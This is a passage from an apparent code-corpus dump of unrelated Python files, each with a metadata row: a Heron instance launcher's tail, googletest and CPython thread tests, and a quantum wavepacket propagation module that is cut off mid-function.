parser.add_argument('--max_ram', required=True, help='Maximum RAM to limit', type=int)
args = parser.parse_args()
sys_config = yaml_config_reader(args.sys_config)
override_config = yaml_config_reader(args.override_config)
system_config.set_sys_config(sys_config, override_config)
# get combined configuration
sys_config = system_config.get_sys_config()
# set resource limits
set_resource_limit(args.max_ram)
# create the protobuf instance
instance_info = physical_plan_pb2.InstanceInfo()
instance_info.task_id = args.task_id
instance_info.component_index = args.component_index
instance_info.component_name = args.component_name
instance = physical_plan_pb2.Instance()
instance.instance_id = args.instance_id
instance.stmgr_id = args.stmgr_id
instance.info.MergeFrom(instance_info)
# Logging init
log_dir = os.path.abspath(sys_config[constants.HERON_LOGGING_DIRECTORY])
max_log_files = sys_config[constants.HERON_LOGGING_MAXIMUM_FILES]
max_log_bytes = sys_config[constants.HERON_LOGGING_MAXIMUM_SIZE_MB] * constants.MB
log_file = os.path.join(log_dir, args.instance_id + ".log.0")
log.init_rotating_logger(level=logging.INFO, logfile=log_file,
max_files=max_log_files, max_bytes=max_log_bytes)
Log.info("\nStarting instance: " + args.instance_id + " for topology: " + args.topology_name +
" and topologyId: " + args.topology_id + " for component: " + args.component_name +
" with taskId: " + str(args.task_id) + " and componentIndex: " +
str(args.component_index) +
" and stmgrId: " + args.stmgr_id + " and stmgrPort: " + str(args.stmgr_port) +
" and metricsManagerPort: " + str(args.metricsmgr_port) +
"\n **Topology Pex file located at: " + args.topology_pex)
Log.debug("System config: " + str(sys_config))
Log.debug("Override config: " + str(override_config))
Log.debug("Maximum RAM: " + str(args.max_ram))
heron_instance = SingleThreadHeronInstance(args.topology_name, args.topology_id, instance,
args.stmgr_port, args.metricsmgr_port,
args.topology_pex)
heron_instance.start()
if __name__ == '__main__':
main()
| apache-2.0 | -3,452,371,859,321,656,300 | 42.503797 | 99 | 0.689828 | false |
skulbrane/googletest | test/gtest_env_var_test.py | 2408 | 3487 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly parses environment variables."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name == 'nt'
IS_LINUX = os.name == 'posix' and os.uname()[0] == 'Linux'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_env_var_test_')
environ = os.environ.copy()
def AssertEq(expected, actual):
if expected != actual:
print 'Expected: %s' % (expected,)
print ' Actual: %s' % (actual,)
raise AssertionError
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
def GetFlag(flag):
"""Runs gtest_env_var_test_ and returns its output."""
args = [COMMAND]
if flag is not None:
args += [flag]
return gtest_test_utils.Subprocess(args, env=environ).output
def TestFlag(flag, test_val, default_val):
"""Verifies that the given flag is affected by the corresponding env var."""
env_var = 'GTEST_' + flag.upper()
SetEnvVar(env_var, test_val)
AssertEq(test_val, GetFlag(flag))
SetEnvVar(env_var, None)
AssertEq(default_val, GetFlag(flag))
class GTestEnvVarTest(gtest_test_utils.TestCase):
def testEnvVarAffectsFlag(self):
"""Tests that environment variable should affect the corresponding flag."""
TestFlag('break_on_failure', '1', '0')
TestFlag('color', 'yes', 'auto')
TestFlag('filter', 'FooTest.Bar', '*')
TestFlag('output', 'xml:tmp/foo.xml', '')
TestFlag('print_time', '0', '1')
TestFlag('repeat', '999', '1')
TestFlag('throw_on_failure', '1', '0')
TestFlag('death_test_style', 'threadsafe', 'fast')
TestFlag('catch_exceptions', '0', '1')
if IS_LINUX:
TestFlag('death_test_use_fork', '1', '0')
TestFlag('stack_trace_depth', '0', '100')
if __name__ == '__main__':
gtest_test_utils.Main()
| bsd-3-clause | -2,378,697,841,585,359,000 | 32.854369 | 79 | 0.708632 | false |
mancoast/CPythonPyc_test | cpython/253_test_dummy_thread.py | 70 | 7192 | """Generic thread tests.
Meant to be used by dummy_thread and thread. To allow for different modules
to be used, test_main() can be called with the module to use as the thread
implementation as its sole argument.
"""
import dummy_thread as _thread
import time
import Queue
import random
import unittest
from test import test_support
DELAY = 0 # Set > 0 when testing a module other than dummy_thread, such as
# the 'thread' module.
class LockTests(unittest.TestCase):
"""Test lock objects."""
def setUp(self):
# Create a lock
self.lock = _thread.allocate_lock()
def test_initlock(self):
        #Make sure locks start unlocked
self.failUnless(not self.lock.locked(),
"Lock object is not initialized unlocked.")
def test_release(self):
# Test self.lock.release()
self.lock.acquire()
self.lock.release()
self.failUnless(not self.lock.locked(),
"Lock object did not release properly.")
def test_improper_release(self):
#Make sure release of an unlocked thread raises _thread.error
self.failUnlessRaises(_thread.error, self.lock.release)
def test_cond_acquire_success(self):
#Make sure the conditional acquiring of the lock works.
self.failUnless(self.lock.acquire(0),
"Conditional acquiring of the lock failed.")
def test_cond_acquire_fail(self):
#Test acquiring locked lock returns False
self.lock.acquire(0)
self.failUnless(not self.lock.acquire(0),
"Conditional acquiring of a locked lock incorrectly "
"succeeded.")
def test_uncond_acquire_success(self):
#Make sure unconditional acquiring of a lock works.
self.lock.acquire()
self.failUnless(self.lock.locked(),
"Uncondional locking failed.")
def test_uncond_acquire_return_val(self):
#Make sure that an unconditional locking returns True.
self.failUnless(self.lock.acquire(1) is True,
"Unconditional locking did not return True.")
self.failUnless(self.lock.acquire() is True)
def test_uncond_acquire_blocking(self):
#Make sure that unconditional acquiring of a locked lock blocks.
def delay_unlock(to_unlock, delay):
"""Hold on to lock for a set amount of time before unlocking."""
time.sleep(delay)
to_unlock.release()
self.lock.acquire()
start_time = int(time.time())
_thread.start_new_thread(delay_unlock,(self.lock, DELAY))
if test_support.verbose:
print
print "*** Waiting for thread to release the lock "\
"(approx. %s sec.) ***" % DELAY
self.lock.acquire()
end_time = int(time.time())
if test_support.verbose:
print "done"
self.failUnless((end_time - start_time) >= DELAY,
"Blocking by unconditional acquiring failed.")
class MiscTests(unittest.TestCase):
"""Miscellaneous tests."""
def test_exit(self):
#Make sure _thread.exit() raises SystemExit
self.failUnlessRaises(SystemExit, _thread.exit)
def test_ident(self):
#Test sanity of _thread.get_ident()
self.failUnless(isinstance(_thread.get_ident(), int),
"_thread.get_ident() returned a non-integer")
self.failUnless(_thread.get_ident() != 0,
"_thread.get_ident() returned 0")
def test_LockType(self):
        #Make sure _thread.LockType is the same type as _thread.allocate_lock()
self.failUnless(isinstance(_thread.allocate_lock(), _thread.LockType),
"_thread.LockType is not an instance of what is "
"returned by _thread.allocate_lock()")
def test_interrupt_main(self):
#Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
self.failUnlessRaises(KeyboardInterrupt, _thread.start_new_thread,
call_interrupt, tuple())
def test_interrupt_in_main(self):
        # Make sure that if interrupt_main is called in the main thread that
# KeyboardInterrupt is raised instantly.
self.failUnlessRaises(KeyboardInterrupt, _thread.interrupt_main)
class ThreadTests(unittest.TestCase):
"""Test thread creation."""
def test_arg_passing(self):
#Make sure that parameter passing works.
def arg_tester(queue, arg1=False, arg2=False):
"""Use to test _thread.start_new_thread() passes args properly."""
queue.put((arg1, arg2))
testing_queue = Queue.Queue(1)
_thread.start_new_thread(arg_tester, (testing_queue, True, True))
result = testing_queue.get()
self.failUnless(result[0] and result[1],
"Argument passing for thread creation using tuple failed")
_thread.start_new_thread(arg_tester, tuple(), {'queue':testing_queue,
'arg1':True, 'arg2':True})
result = testing_queue.get()
self.failUnless(result[0] and result[1],
"Argument passing for thread creation using kwargs failed")
_thread.start_new_thread(arg_tester, (testing_queue, True), {'arg2':True})
result = testing_queue.get()
self.failUnless(result[0] and result[1],
"Argument passing for thread creation using both tuple"
" and kwargs failed")
def test_multi_creation(self):
#Make sure multiple threads can be created.
def queue_mark(queue, delay):
"""Wait for ``delay`` seconds and then put something into ``queue``"""
time.sleep(delay)
queue.put(_thread.get_ident())
thread_count = 5
testing_queue = Queue.Queue(thread_count)
if test_support.verbose:
print
print "*** Testing multiple thread creation "\
"(will take approx. %s to %s sec.) ***" % (DELAY, thread_count)
for count in xrange(thread_count):
if DELAY:
local_delay = round(random.random(), 1)
else:
local_delay = 0
_thread.start_new_thread(queue_mark,
(testing_queue, local_delay))
time.sleep(DELAY)
if test_support.verbose:
print 'done'
self.failUnless(testing_queue.qsize() == thread_count,
"Not all %s threads executed properly after %s sec." %
(thread_count, DELAY))
def test_main(imported_module=None):
global _thread, DELAY
if imported_module:
_thread = imported_module
DELAY = 2
if test_support.verbose:
print
print "*** Using %s as _thread module ***" % _thread
test_support.run_unittest(LockTests, MiscTests, ThreadTests)
if __name__ == '__main__':
test_main()
| gpl-3.0 | 6,847,886,768,873,957,000 | 38.516484 | 83 | 0.596079 | false |
liam-middlebrook/yaml-cpp.new-api | test/gmock-1.7.0/gtest/test/gtest_throw_on_failure_test.py | 2917 | 5766 | #!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests Google Test's throw-on-failure mode with exceptions disabled.
This script invokes gtest_throw_on_failure_test_ (a program written with
Google Test) with different environments and command line flags.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
# Constants.
# The command line flag for enabling/disabling the throw-on-failure mode.
THROW_ON_FAILURE = 'gtest_throw_on_failure'
# Path to the gtest_throw_on_failure_test_ program, compiled with
# exceptions disabled.
EXE_PATH = gtest_test_utils.GetTestExecutablePath(
'gtest_throw_on_failure_test_')
# Utilities.
def SetEnvVar(env_var, value):
"""Sets an environment variable to a given value; unsets it when the
given value is None.
"""
env_var = env_var.upper()
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def Run(command):
"""Runs a command; returns True/False if its exit code is/isn't 0."""
print 'Running "%s". . .' % ' '.join(command)
p = gtest_test_utils.Subprocess(command)
return p.exited and p.exit_code == 0
# The tests. TODO(wan@google.com): refactor the class to share common
# logic with code in gtest_break_on_failure_unittest.py.
class ThrowOnFailureTest(gtest_test_utils.TestCase):
"""Tests the throw-on-failure mode."""
def RunAndVerify(self, env_var_value, flag_value, should_fail):
"""Runs gtest_throw_on_failure_test_ and verifies that it does
(or does not) exit with a non-zero code.
Args:
      env_var_value:    value of the GTEST_THROW_ON_FAILURE environment
                        variable; None if the variable should be unset.
      flag_value:       value of the --gtest_throw_on_failure flag;
None if the flag should not be present.
should_fail: True iff the program is expected to fail.
"""
SetEnvVar(THROW_ON_FAILURE, env_var_value)
if env_var_value is None:
env_var_value_msg = ' is not set'
else:
env_var_value_msg = '=' + env_var_value
if flag_value is None:
flag = ''
elif flag_value == '0':
flag = '--%s=0' % THROW_ON_FAILURE
else:
flag = '--%s' % THROW_ON_FAILURE
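    # Resulting flag on the command line (mirrors the branches above):
    #   flag_value=None -> no flag;  '0' -> '--gtest_throw_on_failure=0';
    #   anything else   -> '--gtest_throw_on_failure'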
command = [EXE_PATH]
if flag:
command.append(flag)
if should_fail:
should_or_not = 'should'
else:
should_or_not = 'should not'
failed = not Run(command)
SetEnvVar(THROW_ON_FAILURE, None)
msg = ('when %s%s, an assertion failure in "%s" %s cause a non-zero '
'exit code.' %
(THROW_ON_FAILURE, env_var_value_msg, ' '.join(command),
should_or_not))
self.assert_(failed == should_fail, msg)
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(env_var_value=None, flag_value=None, should_fail=False)
def testThrowOnFailureEnvVar(self):
"""Tests using the GTEST_THROW_ON_FAILURE environment variable."""
self.RunAndVerify(env_var_value='0',
flag_value=None,
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value=None,
should_fail=True)
def testThrowOnFailureFlag(self):
"""Tests using the --gtest_throw_on_failure flag."""
self.RunAndVerify(env_var_value=None,
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value=None,
flag_value='1',
should_fail=True)
def testThrowOnFailureFlagOverridesEnvVar(self):
"""Tests that --gtest_throw_on_failure overrides GTEST_THROW_ON_FAILURE."""
self.RunAndVerify(env_var_value='0',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='0',
flag_value='1',
should_fail=True)
self.RunAndVerify(env_var_value='1',
flag_value='0',
should_fail=False)
self.RunAndVerify(env_var_value='1',
flag_value='1',
should_fail=True)
if __name__ == '__main__':
gtest_test_utils.Main()
| mit | 1,361,324,784,746,420,200 | 32.719298 | 79 | 0.656261 | false |
acuzzio/GridQuantumPropagator | src/quantumpropagator/TDPropagator.py | 1 | 30840 | ''' this is the module for the hamiltonian '''
import numpy as np
import os
import pickle
import datetime
from quantumpropagator import (printDict, printDictKeys, loadInputYAML, bring_input_to_AU,
warning, labTranformA, gaussian2, makeJustAnother2DgraphComplex,
fromHartreetoCmMin1, makeJustAnother2DgraphMULTI,derivative3d,rk4Ene3d,derivative1dPhi,
good, asyncFun, derivative1dGam, create_enumerated_folder, fromCmMin1toFs,
makeJustAnother2DgraphComplexALLS, derivative2dGamThe, retrieve_hdf5_data,
writeH5file, writeH5fileDict, heatMap2dWavefunction, abs2, fromHartoEv,
makeJustAnother2DgraphComplexSINGLE, fromLabelsToFloats, derivative2dGamTheMu,
graphic_Pulse,derivative3dMu,equilibriumIndex, readWholeH5toDict, err)
from quantumpropagator.CPropagator import (CextractEnergy3dMu, Cderivative3dMu, Cenergy_2d_GamThe,
Cderivative_2d_GamThe,Cenergy_1D_Phi, Cderivative_1D_Phi,
Cenergy_1D_Gam, Cderivative_1D_Gam, Cenergy_1D_The,
Cderivative_1D_The,Crk4Ene3d, version_Cpropagator, pulZe,
Cderivative3dMu_reverse_time)
def calculate_stuffs_on_WF(single_wf, inp, outputFile):
'''
    This function is a standalone function that recreates the output file, also accounting for the absorbing potential
'''
counter = 0
nstates = inp['nstates']
ii = 0
wf = single_wf['WF']
t_fs,t = single_wf['Time']
kind = inp['kind']
if kind != '3d':
err('This function is implemented only in 3d code')
CEnergy, Cpropagator = select_propagator(kind)
kin, pot, pul, absS = CEnergy(t,wf,inp)
kinetic = np.vdot(wf,kin)
potential = np.vdot(wf,pot)
pulse_interaction = np.vdot(wf,pul)
absorbing_potential = np.vdot(wf,absS)
absorbing_potential_thing = np.real(-2j * absorbing_potential)
total = kinetic + potential + pulse_interaction
initialTotal = inp['initialTotal']
norm_wf = np.linalg.norm(wf)
outputStringS = ' {:04d} |{:10d} |{:11.4f} | {:+e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+10.3e} | {:+10.3e} | {:+10.3e} | {:+10.3e} |'
outputString = outputStringS.format(counter, ii,t*0.02418884,1-norm_wf,fromHartoEv(kinetic.real),fromHartoEv(potential.real),fromHartoEv(total.real),fromHartoEv(initialTotal - total.real), fromHartoEv(pulse_interaction.real), pulZe(t,inp['pulseX']), pulZe(t,inp['pulseY']), pulZe(t,inp['pulseZ']), absorbing_potential_thing)
print(outputString)
kind = inp['kind']
outputStringA = "{:11.4f} {:+7.5e}".format(t,absorbing_potential_thing)
for i in range(nstates):
if kind == '3d':
singleStatewf = wf[:,:,:,i]
singleAbspote = absS[:,:,:,i]
norm_loss_this_step = np.real(-2j * np.vdot(singleStatewf,singleAbspote))
if kind == 'GamThe':
err('no 2d here')
elif kind == 'Phi' or kind == 'Gam' or kind == 'The':
err('no 1d here')
outputStringA += " {:+7.5e} ".format(norm_loss_this_step)
with open(outputFile, "a") as oof:
outputStringS2 = '{}'
outputString2 = outputStringS2.format(outputStringA)
oof.write(outputString2 + '\n')
def expandcube(inp):
return inp
def doubleAxespoins1(Y):
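    # Double the sampling of Y by linear interpolation at the midpoints:
    # N input points -> 2N-1 output points on a twice-finer grid.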
N = len(Y)
X = np.arange(0, 2*N, 2)
X_new = np.arange(2*N-1) # Where you want to interpolate
Y_new = np.interp(X_new, X, Y)
return(Y_new)
def doubleAxespoins(Y):
return (doubleAxespoins1(doubleAxespoins1(Y)))
def select_propagator(kind):
'''
This function will return correct function name for the propagators
kind :: String <- the kind of dynamics
'''
Propagators = {'3d' : (CextractEnergy3dMu, Cderivative3dMu),
'GamThe' : (Cenergy_2d_GamThe,Cderivative_2d_GamThe),
'Phi' : (Cenergy_1D_Phi, Cderivative_1D_Phi),
'Gam' : (Cenergy_1D_Gam, Cderivative_1D_Gam),
'The' : (Cenergy_1D_The, Cderivative_1D_The),
}
return Propagators[kind]
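# Minimal usage sketch (mirrors how propagate3D below consumes the pair; the
# inp dictionary and the wavefunction wf are built there):
#   CEnergy, Cpropagator = select_propagator('3d')
#   kin, pot, pul, absS = CEnergy(t, wf, inp)   # energy pieces at time t
#   wf = Crk4Ene3d(Cpropagator, t, wf, inp)     # one RK4 time step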
def propagate3D(dataDict, inputDict):
'''
Two dictionaries, one from data file and one from input file
    it starts and runs the 3d propagation of the wavefunction.
'''
printDict(inputDict)
printDictKeys(dataDict)
printDictKeys(inputDict)
#startState = inputDict['states']
_, _, _, nstates = dataDict['potCube'].shape
phiL, gamL, theL, natoms, _ = dataDict['geoCUBE'].shape
# INITIAL WF default values
if 'factor' in inputDict:
factor = inputDict['factor']
warning('WF widened using factor: {}'.format(factor))
else:
factor = 1
if 'displ' in inputDict:
displ = inputDict['displ']
else:
displ = (0,0,0)
if 'init_mom' in inputDict:
init_mom = inputDict['init_mom']
else:
init_mom = (0,0,0)
if 'initial_state' in inputDict:
initial_state = inputDict['initial_state']
warning('Initial gaussian wavepacket in state {}'.format(initial_state))
else:
initial_state = 0
wf = np.zeros((phiL, gamL, theL, nstates), dtype=complex)
print(initial_state)
wf[:,:,:,initial_state] = initialCondition3d(wf[:,:,:,initial_state],dataDict,factor,displ,init_mom)
# Take values array from labels (radians already)
phis,gams,thes = fromLabelsToFloats(dataDict)
# take step
dphi = phis[0] - phis[1]
dgam = gams[0] - gams[1]
dthe = thes[0] - thes[1]
inp = { 'dt' : inputDict['dt'],
'fullTime' : inputDict['fullTime'],
'phiL' : phiL,
'gamL' : gamL,
'theL' : theL,
'natoms' : natoms,
'phis' : phis,
'gams' : gams,
'thes' : thes,
'dphi' : dphi,
'dgam' : dgam,
'dthe' : dthe,
'potCube' : dataDict['potCube'],
'kinCube' : dataDict['kinCube'],
'dipCube' : dataDict['dipCUBE'],
'nacCube' : dataDict['smoCube'],
'pulseX' : inputDict['pulseX'],
'pulseY' : inputDict['pulseY'],
'pulseZ' : inputDict['pulseZ'],
'nstates' : nstates,
'kind' : inputDict['kind'],
}
#########################################
# Here the cube expansion/interpolation #
#########################################
inp = expandcube(inp)
########################################
# Potentials to Zero and normalization #
########################################
inp['potCube'] = dataDict['potCube'] - np.amin(dataDict['potCube'])
norm_wf = np.linalg.norm(wf)
good('starting NORM deviation : {}'.format(1-norm_wf))
# magnify the potcube
if 'enePot' in inputDict:
enePot = inputDict['enePot']
inp['potCube'] = inp['potCube'] * enePot
if enePot == 0:
warning('This simulation is done with zero Potential energy')
elif enePot == 1:
good('Simulation done with original Potential energy')
else:
warning('The potential energy has been magnified {} times'.format(enePot))
# constant the kinCube
kinK = False
if kinK:
kokoko = 1000
inp['kinCube'] = inp['kinCube']*kokoko
warning('kincube divided by {}'.format(kokoko))
if 'multiply_nac' in inputDict:
        # this keyword can be used to multiply NACs. It works with a float or a list of triplets
# multiply_nac : 10 -> will multiply all by 10
# multiply_nac : [[1,2,10.0],[3,4,5.0]] -> will multiply 1,2 by 10 and 3,4 by 5
nac_multiplier = inputDict['multiply_nac']
if type(nac_multiplier) == int or type(nac_multiplier) == float:
warning('all Nacs are multiplied by {}'.format(nac_multiplier))
inp['nacCube'] = inp['nacCube'] * nac_multiplier
if type(nac_multiplier) == list:
warning('There is a list of nac multiplications, check input')
for state_one, state_two, multiply_factor in nac_multiplier:
inp['nacCube'][:,:,:,state_one,state_two,:] = inp['nacCube'][:,:,:,state_one,state_two,:]*multiply_factor
inp['nacCube'][:,:,:,state_two,state_one,:] = inp['nacCube'][:,:,:,state_two,state_one,:]*multiply_factor
warning('NACS corresponding of state {} and state {} are multiplied by {}'.format(state_one, state_two, multiply_factor))
inp['Nac_multiplier'] = nac_multiplier
nameRoot = create_enumerated_folder(inputDict['outFol'])
inputDict['outFol'] = nameRoot
inp['outFol'] = nameRoot
numStates = inputDict['states']
###################
# Absorbing Thing #
###################
if 'absorb' in inputDict:
good('ABSORBING POTENTIAL is taken from file')
file_absorb = inputDict['absorb']
print('{}'.format(file_absorb))
inp['absorb'] = retrieve_hdf5_data(file_absorb,'absorb')
else:
good('NO ABSORBING POTENTIAL')
inp['absorb'] = np.zeros_like(inp['potCube'])
################
# slice states #
################
kind = inp['kind']
# Take equilibrium points from directionFile
# warning('This is a bad equilibriumfinder')
# gsm_phi_ind, gsm_gam_ind, gsm_the_ind = equilibriumIndex(inputDict['directions1'],dataDict)
gsm_phi_ind, gsm_gam_ind, gsm_the_ind = (29,28,55)
warning('You inserted equilibrium points by hand: {} {} {}'.format(gsm_phi_ind, gsm_gam_ind, gsm_the_ind))
inp['nstates'] = numStates
if kind == '3d':
inp['potCube'] = inp['potCube'][:,:,:,:numStates]
inp['kinCube'] = inp['kinCube'][:,:,:]
inp['dipCube'] = inp['dipCube'][:,:,:,:,:numStates,:numStates]
wf = wf[:,:,:,:numStates]
good('Propagation in 3D.')
print('\nDimensions:\nPhi: {}\nGam: {}\nThet: {}\nNstates: {}\nNatoms: {}\n'.format(phiL, gamL, theL,numStates, natoms))
elif kind == 'GamThe':
inp['potCube'] = inp['potCube'][gsm_phi_ind,:,:,:numStates]
inp['kinCube'] = inp['kinCube'][gsm_phi_ind,:,:]
inp['dipCube'] = inp['dipCube'][gsm_phi_ind,:,:,:,:numStates,:numStates]
wf = wf[gsm_phi_ind,:,:,:numStates]
good('Propagation in GAM-THE with Phi {}'.format(gsm_phi_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nGam: {}\nThe: {}\nNstates: {}\nNatoms: {}\n'.format(gamL, theL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
elif kind == 'Phi':
inp['potCube'] = inp['potCube'][:,gsm_gam_ind,gsm_the_ind,:numStates]
inp['kinCube'] = inp['kinCube'][:,gsm_gam_ind,gsm_the_ind]
inp['dipCube'] = inp['dipCube'][:,gsm_gam_ind,gsm_the_ind,:,:numStates,:numStates]
wf = wf[:,gsm_gam_ind,gsm_the_ind,:numStates]
good('Propagation in PHI with Gam {} and The {}'.format(gsm_gam_ind,gsm_the_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nPhi: {}\nNstates: {}\nNatoms: {}\n'.format(phiL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
elif kind == 'Gam':
inp['potCube'] = inp['potCube'][gsm_phi_ind,:,gsm_the_ind,:numStates]
inp['kinCube'] = inp['kinCube'][gsm_phi_ind,:,gsm_the_ind]
inp['dipCube'] = inp['dipCube'][gsm_phi_ind,:,gsm_the_ind,:,:numStates,:numStates]
wf = wf[gsm_phi_ind,:,gsm_the_ind,:numStates]
good('Propagation in GAM with Phi {} and The {}'.format(gsm_phi_ind,gsm_the_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nGam: {}\nNstates: {}\nNatoms: {}\n'.format(gamL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
elif kind == 'The':
sposta = False
if sposta:
gsm_phi_ind = 20
gsm_gam_ind = 20
warning('Phi is {}, NOT EQUILIBRIUM'.format(gsm_phi_ind))
warning('Gam is {}, NOT EQUILIBRIUM'.format(gsm_gam_ind))
inp['potCube'] = inp['potCube'][gsm_phi_ind,gsm_gam_ind,:,:numStates]
inp['absorb'] = inp['absorb'][gsm_phi_ind,gsm_gam_ind,:,:numStates]
inp['kinCube'] = inp['kinCube'][gsm_phi_ind,gsm_gam_ind,:]
inp['dipCube'] = inp['dipCube'][gsm_phi_ind,gsm_gam_ind,:,:,:numStates,:numStates]
inp['nacCube'] = inp['nacCube'][gsm_phi_ind,gsm_gam_ind,:,:numStates,:numStates,:]
wf = wf[gsm_phi_ind,gsm_gam_ind,:,:numStates]
# doubleGridPoints
doubleThis = False
if doubleThis:
warning('POINTS DOUBLED ALONG THETA')
inp['thes'] = doubleAxespoins(inp['thes'])
inp['theL'] = inp['thes'].size
inp['dthe'] = inp['thes'][0] - inp['thes'][1]
inp['potCube'] = np.array([doubleAxespoins(x) for x in inp['potCube'].T]).T
newWf = np.empty((inp['theL'],numStates), dtype=complex)
for ssssss in range(numStates):
newWf[:,ssssss] = doubleAxespoins(wf[:,ssssss])
wf = newWf
newNac = np.empty((inp['theL'],numStates,numStates,3))
for nnn in range(2):
for mmm in range(2):
for aaa in range(3):
newNac[:,nnn,mmm,aaa] = doubleAxespoins(inp['nacCube'][:,nnn,mmm,aaa])
inp['nacCube'] = newNac
newKin = np.empty((inp['theL'],9,3))
for nnn in range(9):
for mmm in range(3):
newKin[:,nnn,mmm] = doubleAxespoins(inp['kinCube'][:,nnn,mmm])
inp['kinCube'] = newKin
good('Propagation in THE with Phi {} and Gam {}'.format(gsm_phi_ind,gsm_gam_ind))
print('Shapes: P:{} K:{} W:{} D:{}'.format(inp['potCube'].shape, inp['kinCube'].shape, wf.shape, inp['dipCube'].shape))
print('\nDimensions:\nThe: {}\nNstates: {}\nNatoms: {}\n'.format(theL, numStates, natoms))
norm_wf = np.linalg.norm(wf)
wf = wf / norm_wf
else:
err('I do not recognize the kind')
initial_time_simulation = 0.0
# take a wf from file (and not from initial condition)
if 'initialFile' in inputDict:
warning('we are taking initial wf from file')
wffn = inputDict['initialFile']
print('File -> {}'.format(wffn))
wf_not_norm = retrieve_hdf5_data(wffn,'WF')
initial_time_simulation = retrieve_hdf5_data(wffn,'Time')[1] # in hartree
#wf = wf_not_norm/np.linalg.norm(wf_not_norm)
wf = wf_not_norm
#############################
# PROPAGATOR SELECTION HERE #
#############################
CEnergy, Cpropagator = select_propagator(kind)
good('Cpropagator version: {}'.format(version_Cpropagator()))
# INITIAL DYNAMICS VALUES
dt = inp['dt']
if 'reverse_time' in inputDict:
warning('Time is reversed !!')
dt = -dt
Cpropagator = Cderivative3dMu_reverse_time
t = initial_time_simulation
counter = 0
fulltime = inp['fullTime']
fulltimeSteps = int(fulltime/abs(dt))
deltasGraph = inputDict['deltasGraph']
print('I will do {} steps.\n'.format(fulltimeSteps))
outputFile = os.path.join(nameRoot, 'output')
outputFileP = os.path.join(nameRoot, 'outputPopul')
outputFileA = os.path.join(nameRoot, 'Output_Abs')
print('\ntail -f {}\n'.format(outputFileP))
if inputDict['readme']:
